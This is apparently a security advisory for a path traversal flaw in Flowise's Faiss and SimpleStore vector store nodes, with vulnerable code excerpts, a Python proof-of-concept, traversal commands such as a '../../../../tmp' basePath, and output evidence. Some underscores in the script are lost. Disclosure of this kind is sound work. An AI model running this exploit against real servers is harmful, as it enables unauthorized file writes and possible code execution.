PT-2026-35325 — Path traversal in Npm Flowise+1

PT-2026-35325 · Npm · Flowise+1

Published

2026-04-16

Updated

2026-04-16

CVSS v4.0

4.9

Medium

Vector

AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N

Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a basePath parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

Vulnerability Details

Field	Value
Affected File	`packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91)
Affected File	`packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104)

Prerequisites

Authentication: Valid API token with documentStores:upsert-config permission
Document Store: An existing Document Store with at least one processed chunk
Embedding Credentials: Valid embedding provider credentials (e.g., OpenAI API key)

Root Cause

Faiss (`Faiss.ts`)

typescript

async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
  const basePath = nodeData.inputs?.basePath as string // User-controlled
  // ...
  const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
  await vectorStore.save(basePath) // Direct filesystem write, no validation
}

SimpleStore (`SimpleStore.ts`)

typescript

async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
  const basePath = nodeData.inputs?.basePath as string // User-controlled
  
  let filePath = ''
  if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
  else filePath = basePath // Used directly without sanitization
  
  const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path
}

Impact

An authenticated attacker can:

Write files to arbitrary locations on the server filesystem
Overwrite existing files if the process has write permissions
Potential for code execution by writing to web-accessible directories or startup scripts
Data exfiltration by writing to network-mounted filesystems

Proof of Concept

poc.py

python

#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
 python poc.py --target http://localhost:3000 --token <API KEY> --store-id <STORE ID> --credential <EMBEDDING CREDENTIAL ID>
"""

import argparse
import json
import urllib.request
import urllib.error

def post json(url, data, headers):
  req = urllib.request.Request(
    url,
    data=json.dumps(data).encode("utf-8"),
    headers={**headers, "Content-Type": "application/json"},
    method="POST",
  )
  with urllib.request.urlopen(req, timeout=120) as resp:
    return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
  ap = argparse.ArgumentParser()
  ap.add argument("--target", required=True)
  ap.add argument("--token", required=True)
  ap.add argument("--store-id", required=True)
  ap.add argument("--credential", required=True)
  ap.add argument("--base-path", default="/tmp/flowise-path-traversal-poc")
  args = ap.parse args()

  payload = {
    "storeId": args.store id,
    "vectorStoreName": "faiss",
    "vectorStoreConfig": {"basePath": args.base path},
    "embeddingName": "openAIEmbeddings",
    "embeddingConfig": {"credential": args.credential},
  }

  url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
  headers = {"Authorization": f"Bearer {args.token}"}

  try:
    status, body = post json(url, payload, headers)
    print(body)
  except urllib.error.HTTPError as e:
    print(e.read().decode())

if  name  == " main ":
  main()

Setup

Create a Document Store in Flowise UI
Add a Document Loader (e.g., Plain Text) with any content
Click "Process" to create chunks
Note the Store ID from the URL
Get your embedding credential ID from Settings → Credentials

Exploitation

bash

# Write to /tmp
python poc.py 
 --target http://127.0.0.1:3000 
 --token <API TOKEN> 
 --store-id <STORE ID> 
 --credential <OPENAI CREDENTIAL ID> 
 --base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py 
 --target http://127.0.0.1:3000 
 --token <API TOKEN> 
 --store-id <STORE ID> 
 --credential <OPENAI CREDENTIAL ID> 
 --base-path "../../../../tmp/traversal-test"

Evidence

$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned

{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x 4 user wheel  128 Jan 17 12:00 .
drwxrwxrwt 12 root wheel  384 Jan 17 12:00 ..
-rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json
-rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index

Fix

Path traversal

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-22

Related Identifiers

GHSA-W6V6-49GH-MC9W

Affected Products

Flowise

Flowise-Components